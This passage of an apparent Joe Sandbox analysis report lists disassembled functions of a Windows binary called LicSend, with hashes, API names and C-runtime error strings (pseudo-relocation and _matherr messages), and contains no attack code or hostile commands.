                                                                                                    • Instruction ID: 520ae0392c95a017b16c1e86d6b9671d116f87d78b30b2a463f4c4e7f48651b3
                                                                                                    • Opcode Fuzzy Hash: fcf295b5aa8768ae6ce15292c97890cb21af645081a82375fce64ba212e4556d
                                                                                                    • Instruction Fuzzy Hash: 52013C21B1960649FBD1AB95F9402BCE3A0AF0C790FC44036D94CA3395EE3CE99587A0
                                                                                                    Function 00007FF7D3B99C18 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • Unknown pseudo relocation protocol version %d., xrefs: 00007FF7D3B99EE2
                                                                                                    • Unknown pseudo relocation bit size %d., xrefs: 00007FF7D3B99EBA
                                                                                                    • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF7D3B99ED3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ProtectVirtual
                                                                                                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                                                    • API String ID: 544645111-1286557213
                                                                                                    • Opcode ID: 0492cd2b0110fbee1511658604c500477bf53dc288f0a9f6389e200b583ff242
                                                                                                    • Instruction ID: 900daa56146828d10e689a2ca733880e524c4e0ec4e019684bacff43fc8af079
                                                                                                    • Opcode Fuzzy Hash: 0492cd2b0110fbee1511658604c500477bf53dc288f0a9f6389e200b583ff242
                                                                                                    • Instruction Fuzzy Hash: 1571FF22F1AA0685EEE0AB2195406BCF6A0BF45794FD44237C9AD277C8DE3DE445C770
                                                                                                    Function 00007FF7D3B9FA80 Relevance: 6.1, APIs: 4, Instructions: 92COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Byte$CharLeadMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 2561704868-0
                                                                                                    • Opcode ID: 6a4731a88aa3662155cafbc417d112421a3473268a0349ef87fd8546545edb20
                                                                                                    • Instruction ID: 53a78afbc80c6a5970cceafe19d8715733f0811634e48b948a70712e630e9f61
                                                                                                    • Opcode Fuzzy Hash: 6a4731a88aa3662155cafbc417d112421a3473268a0349ef87fd8546545edb20
                                                                                                    • Instruction Fuzzy Hash: AC31B573A0D28186E7A05F25B4103ADFA90BB847A5FD84136DAC8977D4CE7DD5458B20
                                                                                                    Function 00007FF7D3B9AC10 Relevance: 6.0, APIs: 4, Instructions: 24memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocCreateErrorLastSemaphoreabort
                                                                                                    • String ID:
                                                                                                    • API String ID: 4146797221-0
                                                                                                    • Opcode ID: dfb1d64bbf729df8a88a55cc0c1d5f287949e4b4695e07322a7da532e3dc815e
                                                                                                    • Instruction ID: 5ed8cff792a643ed6065e8a9acc16a975f93556e444ced464820da571eb2f49b
                                                                                                    • Opcode Fuzzy Hash: dfb1d64bbf729df8a88a55cc0c1d5f287949e4b4695e07322a7da532e3dc815e
                                                                                                    • Instruction Fuzzy Hash: B5F08231E1E50386F7D4BBA46C4803DE6A15F09310FD00237D46D621E0DF3CA5598B70
                                                                                                    Function 00007FF7D3B997F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: fprintf
                                                                                                    • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                    • API String ID: 383729395-3474627141
                                                                                                    • Opcode ID: 93020a064968560fb6e8fd87e9f8ed2462cc39105c2bba8f145e5cfab8ad68d5
                                                                                                    • Instruction ID: 61c707bd97ac7d93407e28d5c1453a418098293375613a7b632bf2864fc66685
                                                                                                    • Opcode Fuzzy Hash: 93020a064968560fb6e8fd87e9f8ed2462cc39105c2bba8f145e5cfab8ad68d5
                                                                                                    • Instruction Fuzzy Hash: 87017022918E8885D6529F5CD8011EEF375FF5D79AFA85326EA8C26220DF29D543C710
                                                                                                    Function 00007FF7D3B998A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: fprintf
                                                                                                    • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                    • API String ID: 383729395-2187435201
                                                                                                    • Opcode ID: 4edd7fb680f034d8635567aadb5358d9821b8122c7e83baa35e57ab2eec7e1c4
                                                                                                    • Instruction ID: 21cef232b3ce3ddf2af7254e60aa15b4bc2f9f5982f0bd84d74586b8ea92dd3c
                                                                                                    • Opcode Fuzzy Hash: 4edd7fb680f034d8635567aadb5358d9821b8122c7e83baa35e57ab2eec7e1c4
                                                                                                    • Instruction Fuzzy Hash: DEF06213919E4881D2429F18A4000EEF371FF4DB99F985336EB8D36165DF28D6438750
                                                                                                    Function 00007FF7D3B998B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: fprintf
                                                                                                    • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                    • API String ID: 383729395-4273532761
                                                                                                    • Opcode ID: 0474bf48b120e00db24a61aa5c9821339e380a1df4cbc1804bdca3b933310097
                                                                                                    • Instruction ID: d27e358daf6701dd512700393da0603ca2d8c75c43b3d4ecebf59a97686bfaa2
                                                                                                    • Opcode Fuzzy Hash: 0474bf48b120e00db24a61aa5c9821339e380a1df4cbc1804bdca3b933310097
                                                                                                    • Instruction Fuzzy Hash: 84F06213919E4881D2429F28A4000EEF371FF4DB99F995336EB8D36525DF28D6438750
                                                                                                    Function 00007FF7D3B998C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: fprintf
                                                                                                    • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                    • API String ID: 383729395-4283191376
                                                                                                    • Opcode ID: fd46a65cf543c8bef65525f8ca04d9d039481cfdd0e4d9241d127785d181cc6a
                                                                                                    • Instruction ID: 0b4686b59346d1c326c372efca00c57d5c74fe7da457936a08b5641f3f26220b
                                                                                                    • Opcode Fuzzy Hash: fd46a65cf543c8bef65525f8ca04d9d039481cfdd0e4d9241d127785d181cc6a
                                                                                                    • Instruction Fuzzy Hash: C0F06213919E4881D2429F18A4000EEF371FF4DB99F985336EB8D36565DF28D6438750
                                                                                                    Function 00007FF7D3B998D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: fprintf
                                                                                                    • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                    • API String ID: 383729395-2468659920
                                                                                                    • Opcode ID: fd8ba92c9eaa798f6a7db2cb73e9ab13292664d6d5b349ad265193585fa497c3
                                                                                                    • Instruction ID: d82e90fd571c8c67eab17864abca7571e3cb1580cbe83f0d7b1e14a9282b6a93
                                                                                                    • Opcode Fuzzy Hash: fd8ba92c9eaa798f6a7db2cb73e9ab13292664d6d5b349ad265193585fa497c3
                                                                                                    • Instruction Fuzzy Hash: DFF06253919E4881D2429F18A4000EEF371FF5DB99F985336EB8D36125DF28D6438760
                                                                                                    Function 00007FF7D3B99890 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: fprintf
                                                                                                    • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                    • API String ID: 383729395-4064033741
                                                                                                    • Opcode ID: 15bfff8cb211ccaf6a46a3ef0c6b7ed7caa623ed6f052883c5e405bffc4a8cce
                                                                                                    • Instruction ID: b1af7cba33892680a7841ff0f9cc566e72e60ea881dce295a38d39220c660dd5
                                                                                                    • Opcode Fuzzy Hash: 15bfff8cb211ccaf6a46a3ef0c6b7ed7caa623ed6f052883c5e405bffc4a8cce
                                                                                                    • Instruction Fuzzy Hash: ACF06213919E8881D2429F18A4000EEF371FF8DB99F985336EB8D36565DF28D6438750
                                                                                                    Function 00007FF7D3B99821 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: fprintf
                                                                                                    • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                    • API String ID: 383729395-2713391170
                                                                                                    • Opcode ID: 729c9d76acc960e123572dbabc208572d3d77fcceb50ff850dfa89d492672346
                                                                                                    • Instruction ID: fb8e2f1d36a1cf65439aff283597d37200d4d9761f9d66631271c9d0e5f409d7
                                                                                                    • Opcode Fuzzy Hash: 729c9d76acc960e123572dbabc208572d3d77fcceb50ff850dfa89d492672346
                                                                                                    • Instruction Fuzzy Hash: E9F06212918E4881D2429F18A4000AAF371FF4DB99F985326EF8D36525DF28D5438710
                                                                                                    Function 00007FF7D3B98640 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memsetwcscatwcscpywcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 468205783-0
                                                                                                    • Opcode ID: d78c7754e5141f363246a86ab4ff1f76819f9376f02b7aa2f4ce74b4d41ef8d2
                                                                                                    • Instruction ID: 44b45ef71bcfdb7c33726431cf8e5611165f76a17cccff9b8a087daf417619ed
                                                                                                    • Opcode Fuzzy Hash: d78c7754e5141f363246a86ab4ff1f76819f9376f02b7aa2f4ce74b4d41ef8d2
                                                                                                    • Instruction Fuzzy Hash: 9721D712A19B8545E7A1EF26E81436EF660BB59784FC88136EE8C4B791EF7CD040C360
                                                                                                    Function 00007FF7D3B9A220 Relevance: 5.0, APIs: 4, Instructions: 42COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
